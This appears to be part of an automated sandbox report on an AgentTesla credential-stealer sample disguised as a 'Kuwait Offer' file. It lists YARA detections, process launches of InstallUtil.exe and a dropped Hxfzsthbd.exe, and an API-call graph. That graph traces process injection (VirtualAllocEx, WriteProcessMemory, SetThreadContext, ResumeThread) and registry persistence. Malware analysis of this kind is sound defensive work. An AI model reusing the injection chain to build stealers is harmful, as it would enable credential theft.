                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1348809721.000000000321B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1357567810.0000000004069000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1357567810.0000000004069000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Target ID:2
                                        Start time:02:55:58
                                        Start date:08/10/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                        Imagebase:0x200000
                                        File size:42'064 bytes
                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1476190069.0000000000602000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1476190069.0000000000602000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1480659431.00000000025EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1480659431.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1480659431.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:3
                                        Start time:02:56:09
                                        Start date:08/10/2024
                                        Path:C:\Users\user\AppData\Roaming\Hxfzsthbd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\Hxfzsthbd.exe"
                                        Imagebase:0xd0000
                                        File size:975'872 bytes
                                        MD5 hash:B77B84072A85329568EA006B1B7F4201
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1505492848.0000000003600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1505492848.0000000003600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1478760914.00000000028AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1478760914.00000000028AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1478760914.00000000024F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 34%, ReversingLabs
                                        • Detection: 28%, Virustotal, Browse
                                        Reputation:low
                                        Has exited:true

                                        Target ID:4
                                        Start time:02:56:11
                                        Start date:08/10/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                        Imagebase:0x580000
                                        File size:42'064 bytes
                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1573523640.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1573523640.000000000289C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1573523640.000000000289C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:8
                                        Start time:02:56:17
                                        Start date:08/10/2024
                                        Path:C:\Users\user\AppData\Roaming\Hxfzsthbd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\Hxfzsthbd.exe"
                                        Imagebase:0x5f0000
                                        File size:975'872 bytes
                                        MD5 hash:B77B84072A85329568EA006B1B7F4201
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1571205527.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1571205527.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1598572369.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1598572369.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.1571205527.0000000002AD7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Target ID:9
                                        Start time:02:56:20
                                        Start date:08/10/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                        Imagebase:0x900000
                                        File size:42'064 bytes
                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2575392389.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2575392389.0000000002BE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Has exited:false

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:13.2%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:6.2%
                                          Total number of Nodes:306
                                          Total number of Limit Nodes:10
                                          execution_graph 53837 13c1b18 53838 13c1b35 53837->53838 53839 13c1b45 53838->53839 53844 13c507e 53838->53844 53848 13c4fc7 53838->53848 53853 13c4f59 53838->53853 53857 13c63bf 53838->53857 53845 13c509d 53844->53845 53862 13cfe88 53845->53862 53849 13c4fce 53848->53849 53850 13c4f59 53848->53850 53852 13cfe88 2 API calls 53850->53852 53851 13c4f9f 53852->53851 53854 13c4f78 53853->53854 53856 13cfe88 2 API calls 53854->53856 53855 13c4f9f 53856->53855 53875 62e14ca 53857->53875 53883 62e1488 53857->53883 53887 62e1478 53857->53887 53858 13c63e3 53863 13cfeaf 53862->53863 53867 62e0418 53863->53867 53871 62e0410 53863->53871 53864 13c50c8 53868 62e0461 VirtualProtect 53867->53868 53870 62e04ce 53868->53870 53870->53864 53872 62e0461 VirtualProtect 53871->53872 53874 62e04ce 53872->53874 53874->53864 53876 62e1475 53875->53876 53879 62e14d2 53875->53879 53880 62e14ca 2 API calls 53876->53880 53877 62e14b5 53877->53858 53878 62e15bb 53878->53858 53891 62e15e0 53879->53891 53895 62e15d8 53879->53895 53880->53877 53884 62e149d 53883->53884 53886 62e14ca 2 API calls 53884->53886 53885 62e14b5 53885->53858 53886->53885 53888 62e149d 53887->53888 53890 62e14ca 2 API calls 53888->53890 53889 62e14b5 53889->53858 53890->53889 53892 62e1624 VirtualAlloc 53891->53892 53894 62e1691 53892->53894 53894->53878 53896 62e1624 VirtualAlloc 53895->53896 53898 62e1691 53896->53898 53898->53878 53808 635b1ec 53809 635b1f6 53808->53809 53813 66210f0 53809->53813 53818 6621100 53809->53818 53810 635b234 53814 6621100 53813->53814 53823 6621140 53814->53823 53828 6621130 53814->53828 53815 662112b 53815->53810 53819 6621115 53818->53819 53821 6621140 2 API calls 53819->53821 53822 6621130 2 API calls 53819->53822 53820 662112b 53820->53810 53821->53820 53822->53820 53824 662116d 53823->53824 53825 66211ce 53824->53825 53826 634ed61 VirtualProtect 53824->53826 53827 634ed68 VirtualProtect 53824->53827 53825->53815 53826->53824 53827->53824 53829 6621140 53828->53829 53830 66211ce 53829->53830 53831 634ed61 VirtualProtect 53829->53831 53832 634ed68 VirtualProtect 53829->53832 53830->53815 53831->53829 53832->53829 54000 635b40f 54001 635b419 54000->54001 54005 662991a 54001->54005 54013 6629928 54001->54013 54002 635afa9 54006 662993d 54005->54006 54021 662a193 54006->54021 54024 6629ffd 54006->54024 54027 6629d3c 54006->54027 54030 662a11a 54006->54030 54033 6629d70 54006->54033 54014 662993d 54013->54014 54016 662a193 10 API calls 54014->54016 54017 6629d70 10 API calls 54014->54017 54018 662a11a 10 API calls 54014->54018 54019 6629d3c 10 API calls 54014->54019 54020 6629ffd 10 API calls 54014->54020 54015 6629953 54015->54002 54016->54015 54017->54015 54018->54015 54019->54015 54020->54015 54022 6629dcd 54021->54022 54036 662b0e8 54022->54036 54025 6629dcd 54024->54025 54026 662b0e8 10 API calls 54025->54026 54026->54025 54028 6629d9a 54027->54028 54029 662b0e8 10 API calls 54028->54029 54029->54028 54031 6629dcd 54030->54031 54032 662b0e8 10 API calls 54031->54032 54032->54031 54034 6629d9a 54033->54034 54035 662b0e8 10 API calls 54034->54035 54035->54034 54037 662b10d 54036->54037 54041 662b393 54037->54041 54046 662b36f 54037->54046 54042 662b3cb 54041->54042 54051 662b901 54042->54051 54065 662b908 54042->54065 54043 662b1b3 54047 662b37b 54046->54047 54049 662b901 10 API calls 54047->54049 54050 662b908 10 API calls 54047->54050 54048 662b1b3 54049->54048 54050->54048 54052 662b908 54051->54052 54062 662b93f 54052->54062 54079 662bc5d 54052->54079 54084 662becc 54052->54084 54090 662c44b 54052->54090 54095 662bf7a 54052->54095 54100 662c1a4 54052->54100 54104 662c627 54052->54104 54109 662bf27 54052->54109 54114 662c726 54052->54114 54120 662c6c6 54052->54120 54125 662ca26 54052->54125 54130 662c0d3 54052->54130 54062->54043 54066 662b91d 54065->54066 54067 662b93f 54066->54067 54068 662c0d3 2 API calls 54066->54068 54069 662ca26 2 API calls 54066->54069 54070 662c6c6 2 API calls 54066->54070 54071 662c726 2 API calls 54066->54071 54072 662bf27 2 API calls 54066->54072 54073 662c627 2 API calls 54066->54073 54074 662c1a4 2 API calls 54066->54074 54075 662bf7a 2 API calls 54066->54075 54076 662c44b 2 API calls 54066->54076 54077 662becc 2 API calls 54066->54077 54078 662bc5d 2 API calls 54066->54078 54067->54043 54068->54067 54069->54067 54070->54067 54071->54067 54072->54067 54073->54067 54074->54067 54075->54067 54076->54067 54077->54067 54078->54067 54080 662bc79 54079->54080 54135 662e4d8 54080->54135 54140 662e4c9 54080->54140 54081 662b9d0 54081->54062 54085 662c4f9 54084->54085 54087 662b9d0 54084->54087 54154 662e440 54085->54154 54159 662e431 54085->54159 54086 662c512 54087->54062 54091 662c467 54090->54091 54172 634e871 54091->54172 54176 634e878 54091->54176 54092 662b9d0 54092->54062 54096 662bf97 54095->54096 54098 634e871 WriteProcessMemory 54096->54098 54099 634e878 WriteProcessMemory 54096->54099 54097 662b9d0 54097->54062 54098->54097 54099->54097 54180 662e610 54100->54180 54185 662e601 54100->54185 54101 662c1bc 54105 662c62e 54104->54105 54190 662cef0 54105->54190 54194 662cee1 54105->54194 54106 662c65b 54110 662bf2d 54109->54110 54111 662b9d0 54110->54111 54112 662e4d8 2 API calls 54110->54112 54113 662e4c9 2 API calls 54110->54113 54111->54062 54112->54111 54113->54111 54115 662c6ec 54114->54115 54117 662b9d0 54114->54117 54210 634ea90 54115->54210 54214 634ea88 54115->54214 54116 662c707 54117->54062 54121 662c6d0 54120->54121 54123 634ea90 NtResumeThread 54121->54123 54124 634ea88 NtResumeThread 54121->54124 54122 662c707 54123->54122 54124->54122 54126 662bc5c 54125->54126 54127 662b9d0 54126->54127 54128 662e4d8 2 API calls 54126->54128 54129 662e4c9 2 API calls 54126->54129 54127->54062 54128->54127 54129->54127 54131 662c0f0 54130->54131 54133 634e871 WriteProcessMemory 54131->54133 54134 634e878 WriteProcessMemory 54131->54134 54132 662b9d0 54132->54062 54133->54132 54134->54132 54136 662e4ed 54135->54136 54146 634e710 54136->54146 54150 634e718 54136->54150 54137 662e50f 54137->54081 54141 662e4d2 54140->54141 54142 662e528 54140->54142 54141->54142 54144 634e710 VirtualAllocEx 54141->54144 54145 634e718 VirtualAllocEx 54141->54145 54142->54081 54143 662e50f 54143->54081 54144->54143 54145->54143 54147 634e718 VirtualAllocEx 54146->54147 54149 634e7d4 54147->54149 54149->54137 54151 634e75c VirtualAllocEx 54150->54151 54153 634e7d4 54151->54153 54153->54137 54155 662e455 54154->54155 54164 634e1b0 54155->54164 54168 634e1b8 54155->54168 54156 662e46e 54156->54086 54160 662e440 54159->54160 54162 634e1b0 Wow64SetThreadContext 54160->54162 54163 634e1b8 Wow64SetThreadContext 54160->54163 54161 662e46e 54161->54086 54162->54161 54163->54161 54165 634e1b8 Wow64SetThreadContext 54164->54165 54167 634e279 54165->54167 54167->54156 54169 634e201 Wow64SetThreadContext 54168->54169 54171 634e279 54169->54171 54171->54156 54173 634e878 WriteProcessMemory 54172->54173 54175 634e95d 54173->54175 54175->54092 54177 634e8c4 WriteProcessMemory 54176->54177 54179 634e95d 54177->54179 54179->54092 54181 662e625 54180->54181 54183 634e1b0 Wow64SetThreadContext 54181->54183 54184 634e1b8 Wow64SetThreadContext 54181->54184 54182 662e63e 54182->54101 54183->54182 54184->54182 54186 662e610 54185->54186 54188 634e1b0 Wow64SetThreadContext 54186->54188 54189 634e1b8 Wow64SetThreadContext 54186->54189 54187 662e63e 54187->54101 54188->54187 54189->54187 54191 662cf07 54190->54191 54192 662cf29 54191->54192 54198 662d71e 54191->54198 54192->54106 54195 662cf07 54194->54195 54196 662cf29 54195->54196 54197 662d71e 2 API calls 54195->54197 54196->54106 54197->54196 54202 634ddf5 54198->54202 54206 634de00 54198->54206 54203 634de00 CreateProcessA 54202->54203 54205 634e07c 54203->54205 54208 634de80 CreateProcessA 54206->54208 54209 634e07c 54208->54209 54211 634ead9 NtResumeThread 54210->54211 54213 634eb30 54211->54213 54213->54116 54215 634ead9 NtResumeThread 54214->54215 54217 634eb30 54215->54217 54217->54116 53833 634d5e8 53834 634d637 NtProtectVirtualMemory 53833->53834 53836 634d6af 53834->53836 53899 635ba19 53900 635ba23 53899->53900 53904 6344db8 53900->53904 53909 6344dc8 53900->53909 53901 635ba61 53905 6344dc8 53904->53905 53914 6344f95 53905->53914 53919 6344e9b 53905->53919 53906 6344df3 53906->53901 53910 6344ddd 53909->53910 53912 6344f95 2 API calls 53910->53912 53913 6344e9b 2 API calls 53910->53913 53911 6344df3 53911->53901 53912->53911 53913->53911 53916 6344f9b 53914->53916 53915 63451fa 53915->53906 53916->53915 53917 634ed61 VirtualProtect 53916->53917 53918 634ed68 VirtualProtect 53916->53918 53917->53916 53918->53916 53921 6344ec2 53919->53921 53920 63451fa 53920->53906 53921->53920 53922 634ed61 VirtualProtect 53921->53922 53923 634ed68 VirtualProtect 53921->53923 53922->53921 53923->53921 53924 635b858 53925 635b862 53924->53925 53929 6624ff8 53925->53929 53935 6625008 53925->53935 53926 635b8a0 53930 6625008 53929->53930 53933 6625033 53930->53933 53941 662659b 53930->53941 53946 6625d9d 53930->53946 53951 662615e 53930->53951 53933->53926 53936 662501d 53935->53936 53937 6625033 53936->53937 53938 662659b 2 API calls 53936->53938 53939 662615e 2 API calls 53936->53939 53940 6625d9d 2 API calls 53936->53940 53937->53926 53938->53937 53939->53937 53940->53937 53942 66265d2 53941->53942 53956 6620990 53942->53956 53960 6620984 53942->53960 53947 6626923 53946->53947 53964 6629008 53947->53964 53969 6629018 53947->53969 53953 6626164 53951->53953 53952 66262be 53953->53952 53982 6628ef8 53953->53982 53987 6628ee9 53953->53987 53957 66209ef RegOpenKeyExA 53956->53957 53959 6620aca 53957->53959 53962 6620990 53960->53962 53961 6620a8b RegOpenKeyExA 53963 6620aca 53961->53963 53962->53961 53962->53962 53965 6629018 53964->53965 53974 66206dd 53965->53974 53978 66206e8 53965->53978 53970 662902d 53969->53970 53972 66206e8 CopyFileA 53970->53972 53973 66206dd CopyFileA 53970->53973 53971 662697c 53972->53971 53973->53971 53975 66206e5 CopyFileA 53974->53975 53977 6620875 53975->53977 53980 6620744 53978->53980 53979 662083c CopyFileA 53981 6620875 53979->53981 53980->53979 53980->53980 53983 6628f0d 53982->53983 53992 6620bc8 53983->53992 53996 6620bbc 53983->53996 53988 6628ef8 53987->53988 53990 6620bc8 RegSetValueExA 53988->53990 53991 6620bbc RegSetValueExA 53988->53991 53989 6628f32 53989->53953 53990->53989 53991->53989 53994 6620c2d RegSetValueExA 53992->53994 53995 6620d3a 53994->53995 53997 6620bc8 RegSetValueExA 53996->53997 53999 6620d3a 53997->53999

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 180 62e77b0-62e77b4 181 62e778c-62e779c 180->181 182 62e77b6-62e77ee 180->182 181->180 183 62e77f5-62e7901 182->183 184 62e77f0 182->184 187 62e7925-62e7931 183->187 188 62e7903-62e790f 183->188 184->183 189 62e7938-62e793d 187->189 190 62e7933 187->190 193 62e7919 188->193 191 62e793f-62e794b 189->191 192 62e7975-62e7995 189->192 190->189 194 62e794d 191->194 195 62e7952-62e7970 191->195 200 62e799c-62e7bc5 192->200 201 62e7997 192->201 419 62e791f call 62e99e0 193->419 420 62e791f call 62e99d0 193->420 194->195 196 62e8b99-62e8b9f 195->196 198 62e8ba9 196->198 199 62e8ba1 196->199 199->198 221 62e8232-62e823e 200->221 201->200 222 62e7bca-62e7bd6 221->222 223 62e8244-62e827c 221->223 224 62e7bdd-62e7c9a 222->224 225 62e7bd8 222->225 231 62e8356-62e835c 223->231 242 62e7c9c-62e7cb5 224->242 243 62e7cbb-62e7d0d 224->243 225->224 233 62e8362-62e839a 231->233 234 62e8281-62e82c7 231->234 246 62e86e4-62e86ea 233->246 245 62e82d1-62e82d7 234->245 242->243 265 62e7d0f-62e7d17 243->265 266 62e7d1c-62e7d69 243->266 251 62e82e3-62e82fe 245->251 248 62e839f-62e85a1 246->248 249 62e86f0-62e8738 246->249 345 62e862c-62e8630 248->345 346 62e85a7-62e8627 248->346 259 62e873a-62e87ad 249->259 260 62e87b3-62e87fe 249->260 252 62e8300-62e8304 251->252 253 62e8331-62e8353 251->253 252->253 254 62e8306-62e832e 252->254 253->231 254->253 259->260 283 62e8b63-62e8b69 260->283 268 62e8223-62e822f 265->268 280 62e7d6b-62e7d73 266->280 281 62e7d78-62e7dc5 266->281 268->221 280->268 297 62e7dc7-62e7dcf 281->297 298 62e7dd4-62e7e21 281->298 285 62e8b6f-62e8b97 283->285 286 62e8803-62e885c 283->286 285->196 300 62e885e-62e8879 286->300 301 62e8884-62e8890 286->301 297->268 325 62e7e23-62e7e2b 298->325 326 62e7e30-62e7e7d 298->326 300->301 302 62e8897-62e88a3 301->302 303 62e8892 301->303 307 62e88b6-62e88c5 302->307 308 62e88a5-62e88b1 302->308 303->302 311 62e88ce-62e8b2b 307->311 312 62e88c7 307->312 310 62e8b4a-62e8b60 308->310 310->283 340 62e8b36-62e8b42 311->340 312->311 316 62e89db-62e8a1b 312->316 317 62e8996-62e89d6 312->317 318 62e88d4-62e893d 312->318 319 62e8942-62e8991 312->319 320 62e8a20-62e8a88 312->320 316->340 317->340 318->340 319->340 347 62e8afc-62e8b02 320->347 325->268 353 62e7e7f-62e7e87 326->353 354 62e7e8c-62e7ed9 326->354 340->310 348 62e868d-62e86ca 345->348 349 62e8632-62e868b 345->349 364 62e86cb-62e86e1 346->364 350 62e8a8a-62e8ae8 347->350 351 62e8b04-62e8b0e 347->351 348->364 349->364 366 62e8aef-62e8af9 350->366 367 62e8aea 350->367 351->340 353->268 372 62e7edb-62e7ee3 354->372 373 62e7ee8-62e7f35 354->373 364->246 366->347 367->366 372->268 377 62e7f37-62e7f3f 373->377 378 62e7f44-62e7f91 373->378 377->268 382 62e7f93-62e7f9b 378->382 383 62e7fa0-62e7fed 378->383 382->268 387 62e7fef-62e7ff7 383->387 388 62e7ffc-62e8049 383->388 387->268 392 62e804b-62e8053 388->392 393 62e8058-62e80a5 388->393 392->268 397 62e80a7-62e80af 393->397 398 62e80b4-62e8101 393->398 397->268 402 62e8103-62e810b 398->402 403 62e8110-62e815d 398->403 402->268 407 62e815f-62e8167 403->407 408 62e816c-62e81b9 403->408 407->268 412 62e81bb-62e81c3 408->412 413 62e81c5-62e8212 408->413 412->268 417 62e821e-62e8220 413->417 418 62e8214-62e821c 413->418 417->268 418->268 419->187 420->187
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2
                                          • API String ID: 0-450215437
                                          • Opcode ID: 5b5c063f5f97c9253ead83be0ad1d2481e2e292a0ca413475e0a7c48bb5e6d90
                                          • Instruction ID: 56eb1c47c8c8b4e87efe2a0c59518ac02a4231b9434d4b6dfae8e1062d3d4a9b
                                          • Opcode Fuzzy Hash: 5b5c063f5f97c9253ead83be0ad1d2481e2e292a0ca413475e0a7c48bb5e6d90
                                          • Instruction Fuzzy Hash: 04C2AEB4E01229CFDB65DF68C884B99B7B6FB89304F1081E9D909AB355DB349E85CF40
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4
                                          • API String ID: 0-4088798008
                                          • Opcode ID: e8d194de0e5245ca929d792df6c198a7c9899a5f64224ee06fff8d7cf8d0c5c2
                                          • Instruction ID: bc130880e77fc4a07d0616d787b8e65d8392d36540af87619c999a7e408a8a43
                                          • Opcode Fuzzy Hash: e8d194de0e5245ca929d792df6c198a7c9899a5f64224ee06fff8d7cf8d0c5c2
                                          • Instruction Fuzzy Hash: 6AA2E434A00228DFDB54DF95C994BADB7B6FF48700F1581A9E506AB3A5CB70AC85CF90

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 722 634a3a8-634a3c9 723 634a3d0-634a468 call 634acd8 722->723 724 634a3cb 722->724 728 634a46e-634a4a5 723->728 724->723 730 634a4b4 728->730 731 634a4a7-634a4b2 728->731 732 634a4be-634a590 730->732 731->732 741 634a5a2-634a5cd 732->741 742 634a592-634a598 732->742 743 634ac3a-634ac56 741->743 742->741 744 634a5d2-634a6fb 743->744 745 634ac5c-634ac77 743->745 754 634a70d-634a85c 744->754 755 634a6fd-634a703 744->755 763 634a8b5-634a8bc 754->763 764 634a85e-634a862 754->764 755->754 765 634aa67-634aa83 763->765 766 634a864-634a865 764->766 767 634a86a-634a8b0 764->767 768 634a8c1-634a9af 765->768 769 634aa89-634aaad 765->769 770 634aaf7-634ab46 766->770 767->770 794 634a9b5-634aa60 768->794 795 634aa63-634aa64 768->795 775 634aaf4-634aaf5 769->775 776 634aaaf-634aaf1 769->776 783 634ab58-634aba3 770->783 784 634ab48-634ab4e 770->784 775->770 776->775 787 634aba5-634ac1b 783->787 788 634ac1c-634ac37 783->788 784->783 787->788 788->743 794->795 795->765
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8
                                          • API String ID: 0-4194326291
                                          • Opcode ID: 3ecda558afe6e67a682ac6b326494456d4a6f0b88e5d7e1a44c1001a9bbf307b
                                          • Instruction ID: dbed2d0ed787b449dbe7549aba3c9e0bb66ccb2b59715629ef425808a5f611c1
                                          • Opcode Fuzzy Hash: 3ecda558afe6e67a682ac6b326494456d4a6f0b88e5d7e1a44c1001a9bbf307b
                                          • Instruction Fuzzy Hash: 6542C271D016298FDB64DF69C850AD9FBB2BF89310F1486EAD50DA7250DB30AE85CF90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4
                                          • API String ID: 0-4088798008
                                          • Opcode ID: 6d8fcd79c7b0b901b6a461be8e46b6344c70309f6dd8f5546906b0fc065ac6bf
                                          • Instruction ID: a6b43690da7125e2f6c3fe021a3aacd363783976457ac76b40f35a37fb4cfe20
                                          • Opcode Fuzzy Hash: 6d8fcd79c7b0b901b6a461be8e46b6344c70309f6dd8f5546906b0fc065ac6bf
                                          • Instruction Fuzzy Hash: 3422E934A00229CFDB64DFA4C994BADB7B6FF48304F1481A9D50AAB3A5DB709D85CF50
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0634D69D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: 9605bfe0f115bdd0ea3b19dc1a43f836ae6282eccbd2d9d052b3a905c2f85924
                                          • Instruction ID: 8e4d7c5143fdfb6a07c69667e5a80969dd26b6ca7df9899ac26eb9b4ad539809
                                          • Opcode Fuzzy Hash: 9605bfe0f115bdd0ea3b19dc1a43f836ae6282eccbd2d9d052b3a905c2f85924
                                          • Instruction Fuzzy Hash: 94419CB5D002589FCF10CFA9D880ADEFBB5BF49310F10942AE819B7210D775A946CF94
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0634D69D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: 3871a434f572701321e0e20bfe8ae179e887aad990444861bfeba1a208df3b10
                                          • Instruction ID: a09605718291b70e3869d7e169713854328f92b0cff773a6ebc5f75d7744c79b
                                          • Opcode Fuzzy Hash: 3871a434f572701321e0e20bfe8ae179e887aad990444861bfeba1a208df3b10
                                          • Instruction Fuzzy Hash: A64188B8D002589FCF10CFAAD880ADEFBB1BF09310F14942AE819B7210D775A945CF98
                                          APIs
                                          • NtResumeThread.NTDLL(?,?), ref: 0634EB1E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
